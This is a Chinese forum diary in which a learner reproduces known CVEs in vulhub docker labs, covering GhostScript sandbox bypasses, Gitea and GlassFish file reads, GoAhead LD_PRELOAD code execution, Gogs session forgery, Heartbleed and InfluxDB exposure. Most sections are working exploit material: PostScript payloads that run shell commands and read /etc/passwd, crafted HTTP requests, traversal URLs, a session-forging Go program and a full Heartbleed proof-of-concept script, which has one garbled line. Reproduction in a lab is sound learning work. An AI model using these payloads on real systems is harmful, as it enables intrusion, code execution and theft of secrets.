得到如下我们在上面写入的信息：

```
success
```

![image-20211105210601329](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211105210601329.png)

(今天就先写两个吧，明天继续。。。。)

sandalwood · 发表于 2021-11-6 22:14:52

# GhostScript 沙箱绕过（命令执行）漏洞（CVE-2018-16509）

打开后是这样的：

```
<form method="post" enctype="multipart/form-data">
File: <input type="file" name="file_upload">
<input type="submit">
</form>
```

![image-20211106100155338](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211106100155338.png)

从GitHub上下载了这个版本的poc：

```
%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%id > /tmp/success && cat /tmp/success) currentdevice putdeviceprops
```

将其改为png格式（我重命名为poc.png）

将这个png文件上传到靶场中：

![image-20211106100350817](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211106100350817.png)

上传后，页面中返回如下信息：

```
Image size is: uid=0(root) gid=0(root) groups=0(root)
```

![image-20211106100458421](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211106100458421.png)

此时已经执行命令 `id > /tmp/success && cat /tmp/success`

进入docker容器中去，在命令行中使用命令：

```
docker-compose exec web bash
```

可见success文件已经被创建：

```
docker-compose exec web bash
root@215ecac362db:/# ls
bin  boot  dev  etc  home  lib  lib64  media  mnt  opt  proc  root  run  sbin  srv  sys  tmp  usr  var
root@215ecac362db:/# ls tmp
success
```

![image-20211106100632877](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211106100632877.png)

然后尝试用命令：

```
docker run -it --rm --name im -v `pwd`/poc.png:/poc.png vulhub/imagemagick:7.0.8 convert /poc.png /poc.gif
```

来测试该漏洞（查询ID）（好像是需要再创建一个镜像的样子）：

```
docker run -it --rm --name im -v `pwd`/poc.png:/poc.png vulhub/imagemagick:7.0.8 convert /poc.png /poc.gif                                                                                              1 ⨯
uid=0(root) gid=0(root) groups=0(root)
convert: FailedToExecuteCommand `'gs' -sstdout=%stderr -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 '-sDEVICE=pngalpha' -dTextAlphaBits=4 -dGraphicsAlphaBits=4 '-r72x72' -g612x792  '-sOutputFile=/tmp/magick-1ohC3HenitIoz%d' '-f/tmp/magick-1swzXJvBNvLrn' '-f/tmp/magick-1_cI95mT4i2ub' -c showpage' (-1) @ error/delegate.c/ExternalDelegateCommand/462.
convert: no images defined `/poc.gif' @ error/convert.c/ConvertImageCommand/3288.
```

![image-20211106100958020](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211106100958020.png)

由此可见，id 命令已被成功运行。

# GhostScript 沙箱绕过（命令执行）漏洞（CVE-2018-19475）

打开后是这样的：

```
<form method="post" enctype="multipart/form-data">
File: <input type="file" name="file_upload">
<input type="submit">
</form>
```

![image-20211106130143776](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211106130143776.png)

这个所需要的poc与上一关（CVE-2018-16509）所需要的一样：

```
%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%id > /tmp/success && cat /tmp/success) currentdevice putdeviceprops
```

于是还是将这个文件重命名为.png文件，并将其上传：

得到如下信息：

```
Image size is:
```

![image-20211106130354390](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211106130354390.png)

用burpsuite抓包，并将数据包修改为如下内容：

```
POST /index.php HTTP/1.1
Host: target
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryukZmnyhO
Content-Length: 279

------WebKitFormBoundaryukZmnyhO
Content-Disposition: form-data; name="file_upload"; filename="1.jpg"
content-Type="image/png"

%!PS
0 1 300367 {} for
{save restore} stopped {} if
(%pipe%id > /tmp/success && cat /tmp/success) (w) file
------WebKitFormBoundaryukZmnyhO--

```

![image-20211106130627858](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211106130627858.png)

根据在burpsuite中repeater模块中的response中得到的信息与页面返回的信息相对应，我们可以知道：真实环境下通常无法直接回显漏洞执行结果，我们需要使用带外攻击的方式来检测漏洞。

# GhostScript 沙箱绕过（命令执行）漏洞（CVE-2019-6116）

打开后是这样的（我已经选择了我需要上传我文件）：

![image-20211106131713443](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211106131713443.png)

这次需要的poc与前面的不太一样：

```
%!PS
% extract .actual_pdfpaintproc operator from pdfdict
/.actual_pdfpaintproc pdfdict /.actual_pdfpaintproc get def

/exploit {
(Stage 11: Exploitation...)=

/forceput exch def

systemdict /SAFER false forceput
userparams /LockFilePermissions false forceput
systemdict /userparams get /PermitFileControl [(*)] forceput
systemdict /userparams get /PermitFileWriting [(*)] forceput
systemdict /userparams get /PermitFileReading [(*)] forceput

% update
save restore

% All done.
stop
} def

errordict /typecheck {
/typecount typecount 1 add def
(Stage 10: /typecheck #)=only typecount ==

% The first error will be the .knownget, which we handle and setup the
% stack. The second error will be the ifelse (missing boolean), and then we
% dump the operands.
typecount 1 eq { null } if
typecount 2 eq { pop 7 get exploit } if
typecount 3 eq { (unexpected)= quit }  if
} put

% The pseudo-operator .actual_pdfpaintproc from pdf_draw.ps pushes some
% executable arrays onto the operand stack that contain .forceput, but are not
% marked as executeonly or pseudo-operators.
%
% The routine was attempting to pass them to ifelse, but we can cause that to
% fail because when the routine was declared, it used `bind` but many of the
% names it uses are not operators and so are just looked up in the dictstack.
%
% This means we can push a dict onto the dictstack and control how the routine
% works.
<<
/typecount    0
/PDFfile       { (Stage 0: PDFfile)= currentfile }
/q             { (Stage 1: q)= } % no-op
/oget          { (Stage 3: oget)= pop pop 0 } % clear stack
/pdfemptycount  { (Stage 4: pdfemptycount)= } % no-op
/gput          { (Stage 5: gput)= }  % no-op
/resolvestream  { (Stage 6: resolvestream)= } % no-op
/pdfopdict    { (Stage 7: pdfopdict)= } % no-op
/.pdfruncontext { (Stage 8: .pdfruncontext)= 0 1 mark } % satisfy counttomark and index
/pdfdict       { (Stage 9: pdfdict)=
      % cause a /typecheck error we handle above
      true
}
>> begin <<>> <<>> { .actual_pdfpaintproc } stopped pop

(Should now have complete control over ghostscript, attempting to read /etc/passwd...)=

% Demonstrate reading a file we shouldnt have access to.
(/etc/passwd) (r) file dup 64 string readline pop == closefile

(Attempting to execute a shell command...)= flush

% run command
(%pipe%id > /tmp/success) (w) file closefile

(All done.)=

quit
```

点击上传后，得到如下页面：

```
Image size is:
```

![image-20211106131817465](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211106131817465.png)

在命令行中进入到docker容器中：

可以看到在里面的文件：

```
root@0df078d3e477:/# ls
bin  boot  dev  etc  home  lib  lib64  media  mnt  opt  proc  root  run  sbin  srv  sys  tmp  usr  var
root@0df078d3e477:/# cd tmp
root@0df078d3e477:/tmp# ls
success
```

![image-20211106132040337](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211106132040337.png)

我们也可以用

```
docker run -it --rm --name uu -vpwd/poc.png:/tmp/poc.png vulhub/imagemagick:7.0.8-27-php identify /tmp/poc.png
```

但是这个我没有做出来。。。。

# Gitea 1.4.0 目录穿越导致命令执行漏洞

打开后是这样的：

![image-20211106132842460](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211106132842460.png)

安装完成后创建一个仓库：

![image-20211106133211912](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211106133211912.png)

用burpsuite抓包，并将数据包修改为如下信息：

```
POST /sandalwood/asd.git/info/lfs/objects HTTP/1.1
Host: localhost:3000
Accept-Encoding: gzip, deflate
Accept: application/vnd.git-lfs+json
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 157

{
"Oid": "....../../../etc/passwd",
"Size": 1000000,
"User" : "a",
"Password" : "a",
"Repo" : "a",
"Authorization" : "a"
}

```

在repeater模块中得到如下信息：

```
HTTP/1.1 401 Unauthorized

Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647

Set-Cookie: i_like_gitea=089b8f9e20e64e81; Path=/; HttpOnly

Set-Cookie: _csrf=HtSBgI6SGslRjBq_vM57BOGuyLA6MTYzNjE3NzA0ODA0MjUwMDQ3Mw%3D%3D; Path=/; Expires=Sun, 07 Nov 2021 05:37:28 GMT; HttpOnly

Www-Authenticate: Basic realm=gitea-lfs

X-Frame-Options: SAMEORIGIN

Date: Sat, 06 Nov 2021 05:37:28 GMT

Content-Length: 499

Content-Type: text/plain; charset=utf-8

Connection: close

{"message":"Unauthorized"}{"oid":"....../../../etc/passwd","size":1000000,"actions":{"upload":{"href":"http://localhost:3000/sandalwood/asd.git/info/lfs/etc/passwd","header":{"Accept":"application/vnd.git-lfs","Authorization":"Authorization: Basic dummy"},"expires_at":"0001-01-01T00:00:00Z"},"verify":{"href":"http://localhost:3000/sandalwood/asd.git/info/lfs/verify","header":{"Accept":"application/vnd.git-lfs","Authorization":"Authorization: Basic dummy"},"expires_at":"0001-01-01T00:00:00Z"}}}

```

然后访问：

```
http://localhost:3000/sandalwood/asd.git/info/lfs/objects/......%2F..%2F..%2Fetc%2Fpasswd/sth
```

即可得到如下信息：

```
HTTP/1.1 200 OK

Content-Type: application/vnd.git-lfs+json

Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647

Set-Cookie: i_like_gitea=f0221584854edb12; Path=/; HttpOnly

Set-Cookie: _csrf=hwwhXxKqxKigjnutVXMF9UzokOU6MTYzNjE3NzMxNDM3MzMwMzMwNQ%3D%3D; Path=/; Expires=Sun, 07 Nov 2021 05:41:54 GMT; HttpOnly

X-Frame-Options: SAMEORIGIN

Date: Sat, 06 Nov 2021 05:41:54 GMT

Content-Length: 271

Connection: close

{"oid":"....../../../etc/passwd","size":1000000,"actions":{"download":{"href":"http://localhost:3000/sandalwood/asd.git/info/lfs/etc/passwd","header":{"Accept":"application/vnd.git-lfs","Authorization":"Authorization: Basic dummy"},"expires_at":"0001-01-01T00:00:00Z"}}}

```

![image-20211106134212910](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211106134212910.png)

# GlassFish 任意文件读取漏洞

打开后是这样的：

```
<div style="height: 435px;background-image: url(/resource/community-theme/images/login-backimage-open.png);
background-repeat:no-repeat;background-position:left top; width: 720px; margin: auto;">
<div style="width: 460px; padding-top: 160px; margin-left: 310px;">
<img id="sun_image11" src="/resource/community-theme/images/login-product_name_open.png" alt="GlassFish Server Open Source Edition" height="42" width="329" border="0" />
      <form method="POST" class="form" name="loginform" action="j_security_check">
      <table role="presentation">
      <tr>
         <td><label for="Login.username" style="font-weight: bold;">User Name:</label></td>
         <td><input type="text" name="j_username" id="Login.username" tabindex="1" value=""></td>
      </tr>
      <tr>
         <td><label for="Login.password" style="font-weight: bold;">Password:</label>
         <td><input type="password" name="j_password" id="Login.password" tabindex="2">
      <tr>
         <td colspan="2" align="center">
            <input type="submit" class="Btn1"
                  value="Login"
                  title="Log In to GlassFish Administration Console" tabindex="3"
                  onmouseover="javascript: if (this.disabled==0) this.className='Btn1Hov'"
                  onmouseout="javascript: if (this.disabled==0) this.className='Btn1'"
                  onblur="javascript: if (this.disabled==0) this.className='Btn1'"
                  onfocus="javascript: if (this.disabled==0) this.className='Btn1Hov'"
                  name="loginButton" id="loginButton">
              <input type="hidden" name="loginButton.DisabledHiddenField" value="true" />
      </td>
      </tr>
      </table>
      </form>
</div>
</div>
```

![image-20211106182417068](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211106182417068.png)

这是GlassFish 的管理中心

访问

```
https://your-ip:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
```

，发现已成功读取 /etc/passwd 内容：

```
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false
messagebus:x:101:102::/var/run/dbus:/bin/false
```

![image-20211106182934987](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211106182934987.png)

---

ps:

本环境超级管理员密码在 `docker-compose.yml` 中设置，默认为 `vulhub_default_password`，在 4848 端口利用该密码可以登录管理员账户。

# GoAhead 远程命令执行漏洞（CVE-2017-17562）

打开后是这样的：

```
Congratulations! The server is up and running.
```

![image-20211106183602163](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211106183602163.png)

先将以下的代码保存为C语言的文件：

命名为CVE-2017-17562.c

```
#include <unistd.h>

static void before_main(void) __attribute__((constructor));

static void before_main(void)
{
write(1, "Hello: World!\n", 14);
}
```

用命令：

```
gcc -shared -fPIC ./CVE-2017-17562.c -o payload.so
```

用命令：

```
curl -X POST --data-binary @payload.so "http://127.0.0.1:8080/cgi-bin/index?LD_PRELOAD=/proc/self/fd/0" -i
```

来执行代码

我们发现在执行的结果中有上述的C语言代码中的程序：输出了hello word

```
curl -X POST --data-binary @payload.so "http://127.0.0.1:8080/cgi-bin/index?LD_PRELOAD=/proc/self/fd/0" -i
HTTP/1.1 200 OK
Date: Sat Nov  6 11:18:15 2021
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Pragma: no-cache
Cache-Control: no-cache
hello:  World!
Content-Type: text/html

<title>cgi title</title><h1>hello world!</h1>
```

![image-20211106192016740](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211106192016740.png)

# Gogs 任意用户登录漏洞（CVE-2018-18925）

打开后是这样的（一个安装界面）：

```

```

![image-20211106192823583](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211106192823583.png)

安装过后需要重启docker服务：

```
docker-compose restart
```

否则session是存储在内存中的

用gob生成session文件：

```
package main

import (
"bytes"
"encoding/gob"
"encoding/hex"
"fmt"
"io/ioutil"
"os"
)

func EncodeGob(obj map[interface{}]interface{}) ([]byte, error) {
for _, v := range obj {
      gob.Register(v)
}
buf := bytes.NewBuffer(nil)
err := gob.NewEncoder(buf).Encode(obj)
return buf.Bytes(), err
}

func main() {
var uid int64 = 1
obj := map[interface{}]interface{}{"_old_uid": "1", "uid": uid, "uname": "root"}
data, err := EncodeGob(obj)
if err != nil {
      fmt.Println(err)
}
err = ioutil.WriteFile("data", data, os.O_CREATE|os.O_WRONLY)
if err != nil {
      fmt.Println(err)
}
edata := hex.EncodeToString(data)
fmt.Println(edata)
}

```

申请一个普通的用户，

然后注册一个普通用户账户，创建项目，并在 “版本发布” 页面上传刚生成的 session 文件：

![image-20211106195258443](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211106195258443.png)

通过这个附件的 URL，得知这个文件的文件名：./attachments/2eb7f1a2-b5ec-482e-a297-15b625d24a10。

然后，构造 Cookie：i_like_gogits=../attachments/2/e/2eb7f1a2-b5ec-482e-a297-15b625d24a10，访问即可发现已经成功登录 id=1 的用户（即管理员）：

在登录后用burpsuite抓包

并将数据包中的session修改为上述文件生成的session：

![image-20211106195219453](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211106195219453.png)

sandalwood · 发表于 2021-11-7 22:05:51

今天做了几个CVE的复现，然后又去做了几个LeetCode的题（打击一下自己的C语言）

# 心脏出血漏洞（CVE-2014-0160）

打开后是这样的（好简陋）：

```
Heartbleed Test
```

![image-20211106204029065](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211106204029065.png)

在GitHub上找到了应用于这个漏洞的poc：

注意，这个poc需要用Python3来运行（虽然文本的提示是用Python2来运行，但是用Python2运行总是报错）

```
#!/usr/bin/python

# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.

import sys
import struct
import socket
import time
import select
import binascii
import re
from optparse import OptionParser

options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')

def h2bin(x):
return binascii.unhexlify(x.replace(' ', '').replace('\n', ''))

hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
00 0f 00 01 01
''')

hb = h2bin('''
18 03 02 00 03
01 40 00
''')

def hexdump(s: bytes):
for b in range(0, len(s), 16):
      lin = [c for c in s[b : b + 16]]
      hxdat = ' '.join('%02X' % c for c in lin)
      pdat = ''.join((chr(c) if 32 <= c <= 126 else '.' )for c in lin)
      print('  %04x: %-48s %s' % (b, hxdat, pdat))

print("")

def recvall(s, length, timeout=5):
endtime = time.time() + timeout
rdata = b''
remain = length
while remain > 0:
      rtime = endtime - time.time()
      if rtime < 0:
         return None
      r, w, e = select.select(, [], [], 5)
      if s in r:
         data = s.recv(remain)
         # EOF?
         if not data:
            return None
         rdata += data
         remain -= len(data)
return rdata


def recvmsg(s):
hdr = recvall(s, 5)
if hdr is None:
      print('Unexpected EOF receiving record header - server closed connection')
      return None, None, None
typ, ver, ln = struct.unpack('>BHH', hdr)
pay = recvall(s, ln, 10)
if pay is None:
      print('Unexpected EOF receiving record payload - server closed connection')
      return None, None, None
print(' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)))
return typ, ver, pay

def hit_hb(s):
s.send(hb)
while True:
      typ, ver, pay = recvmsg(s)
      if typ is None:
         print('No heartbeat response received, server likely not vulnerable')
         return False

      if typ == 24:
         print('Received heartbeat response:')
         hexdump(pay)
         if len(pay) > 3:
            print('WARNING: server returned more data than it should - server is vulnerable!')
         else:
            print('Server processed malformed heartbeat, but did not return any extra data.')
         return True

      if typ == 21:
         print('Received alert:')
         hexdump(pay)
         print('Server returned error, likely not vulnerable')
         return False

def main():
opts, args = options.parse_args()
if len(args) < 1:
      options.print_help()
      return

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print('Connecting...')
sys.stdout.flush()
s.connect((args[0], opts.port))
print('Sending Client Hello...')
sys.stdout.flush()
s.send(hello)
print('Waiting for Server Hello...')
sys.stdout.flush()
while True:
      typ, ver, pay = recvmsg(s)
      if typ == None:
         print('Server closed connection without sending Server Hello.')
         return
      # Look for server hello done message.
      if typ == 22 and pay[0] == 0x0E:
         break

print('Sending heartbeat request...')
sys.stdout.flush()
s.send(hb)
hit_hb(s)

if __name__ == '__main__':
main()
```

运行命令：

```
Python3 （文件名） IP地址
```

运行结果（部分）：

```
python3 CVE-2014-0160.py 127.0.0.1
Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 66
... received message: type = 22, ver = 0302, length = 822
... received message: type = 22, ver = 0302, length = 331
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
  0000: 02 40 00 18 03 02 00 03 01 40 00 9B 72 0B BC 0C  .@.......@..r...
  0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90  .+..H...9.......
  0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0  .w.3....f.....".
  0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00  !.9.8.........5.
  0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0  ................
  0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00  ............3.2.
  0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00  ....E.D...../...
  0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00  A...............
  0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01  ................
  0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00  ..I...........4.
  00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00  2...............
  00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00  ................
  00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00  ................
  00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 00 00 00 00  ....#...........
```

![image-20211107091250788](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211107091250788.png)

但是比较奇怪的是没有得到理想的结果（cookie）

---

用Python2运行时的报错结果如下：

```
  File "CVE-2014-0160.py", line 44
def hexdump(s: bytes):
               ^
SyntaxError: invalid syntax
```

![image-20211107091421881](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211107091421881.png)

# influxdb未授权访问漏洞

打开后为如下页面：

```
404 page not found

```

![image-20211107102136260](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211107102136260.png)

发现什么也没有，结果发现是要访问地址：

```
IP地址：8086/debug/vars
```

得到如下页面：

图中信息只复制一部分：

```
{
"system": {"currentTime":"2021-11-07T02:22:39.189245668Z","started":"2021-11-07T02:19:10.886436276Z","uptime":208},
"cmdline": ["influxd"],
"memstats": {"Alloc":3930848,"TotalAlloc":21201816,"Sys":11671800,"Lookups":1071,"Mallocs":326829,"Frees":304215,"HeapAlloc":3930848,"HeapSys":7634944,"HeapIdle":1966080,"HeapInuse":5668864,"HeapReleased":0,"HeapObjects":22614,"StackInuse":753664,"StackSys":753664,"MSpanInuse":75696,"MSpanSys":98304,"MCacheInuse":6944,"MCacheSys":16384,"BuckHashSys":1448975,"GCSys":479232,"OtherSys":1240297,"NextGC":5527264,"LastGC":1636251710030723824,"PauseTotalNs":1541211,"PauseNs":[85786,240697,122788,151365,158038,120096,191089,335247,136105,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],"PauseEnd":[1636251551320297500,1636251551333176071,1636251551343051201,1636251551352092229,1636251551360037982,1636251551366007666,1636251570025215594,1636251630006504159,1636251710030723824,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],"NumGC":9,"NumForcedGC":0,"GCCPUFraction":0.00006218672473663532,"EnableGC":true,"DebugGC":false,"BySize":[{"Size":0,"Mallocs":0,"Frees":0},{"Size":8,"Mallocs":789,"Frees":685},{"Size":16,"Mallocs":129249,"Frees":121318},{"Size":32,"Mallocs":85712,"Frees":77540},{"Size":48,"Mallocs":15338,"Frees":13653},{"Size":64,"Mallocs":6753,"Frees":5938},{"Size":80,"Mallocs":11416,"Frees":11131},{"Size":96,"Mallocs":1323,"Frees":1044},{"Size":112,"Mallocs":1671,"Frees":1534},{"Size":128,"Mallocs":958,"Frees":856},{"Size":144,"Mallocs":452,"Frees":341},{"Size":160,"Mallocs":1713,"Frees":1395},{"Size":176,"Mallocs":600,"Frees":526},{"Size":192,"Mallocs":206,"Frees":171},{"Size":208,"Mallocs":2165,"Frees":1737},{"Size":224,"Mallocs":2196,"Frees":1706},{"Size":240,"Mallocs":256,"Frees":187},{"Size":256,"Mallocs":280,"Frees":110},{"Size":288,"Mallocs":460,"Frees":354},{"Size":320,"Mallocs":819,"Frees":654},{"Size":352,"Mallocs":352,"Frees":256},{"Size":384,"Mallocs":157,"Frees":9},{"Size":416,"Mallocs":90,"Frees":55},{"Size":448,"Mallocs":174,"Frees":137},{"Size":480,"Mallocs":21,"Frees":13},{"Size":512,"Mallocs":303,"Frees":172},{"Size":576,"Mallocs":379,"Frees":300},{"Size":640,"Mallocs":34,"Frees":22},{"Size":704,"Mallocs":86,"Frees":69},{"Size":768,"Mallocs":784,"Frees":782},{"Size":896,"Mallocs":215,"Frees":167},{"Size":1024,"Mallocs":292,"Frees":199},{"Size":1152,"Mallocs":233,"Frees":188},{"Size":1280,"Mallocs":159,"Frees":148},{"Size":1408,"Mallocs":1022,"Frees":836},{"Size":1536,"Mallocs":243,"Frees":222},{"Size":1792,"Mallocs":171,"Frees":154},{"Size":2048,"Mallocs":425,"Frees":384},{"Size":2304,"Mallocs":95,"Frees":84},{"Size":2688,"Mallocs":169,"Frees":163},{"Size":3072,"Mallocs":17,"Frees":17},{"Size":3200,"Mallocs":8,"Frees":7},{"Size":3456,"Mallocs":3,"Frees":3},{"Size":4096,"Mallocs":30,"Frees":19},{"Size":4864,"Mallocs":7,"Frees":6},{"Size":5376,"Mallocs":4,"Frees":0},{"Size":6144,"Mallocs":35,"Frees":18},{"Size":6528,"Mallocs":1,"Frees":1},{"Size":6784,"Mallocs":0,"Frees":0},{"Size":6912,"Mallocs":0,"Frees":0},{"Size":8192,"Mallocs":13,"Frees":2},{"Size":9472,"Mallocs":7,"Frees":1},{"Size":9728,"Mallocs":0,"Frees":0},{"Size":10240,"Mallocs":0,"Frees":0},{"Size":10880,"Mallocs":0,"Frees":0},{"Size":12288,"Mallocs":37,"Frees":22},{"Size":13568,"Mallocs":1,"Frees":1},{"Size":14336,"Mallocs":0,"Frees":0},{"Size":16384,"Mallocs":1,"Frees":0},{"Size":18432,"Mallocs":2,"Frees":1},{"Size":19072,"Mallocs":0,"Frees":0}]},
"runtime": {"name":"runtime","tags":{},"values":{"Alloc":3842640,"Frees":304183,"HeapAlloc":3842640,"HeapIdle":2031616,"HeapInUse":5603328,"HeapObjects":22355,"HeapReleased":0,"HeapSys":7634944,"Lookups":1069,"Mallocs":326538,"NumGC":9,"NumGoroutine":21,"PauseTotalNs":1541211,"Sys":11671800,"TotalAlloc":21113608}},
"queryExecutor": {"name":"queryExecutor","tags":null,"values":{"queriesActive":0,"queriesExecuted":0,"queriesFinished":0,"queryDurationNs":0,"recoveredPanics":0}},
"database:_internal": {"name":"database","tags":{"database":"_internal"},"values":{"numMeasurements":12,"numSeries":12}},
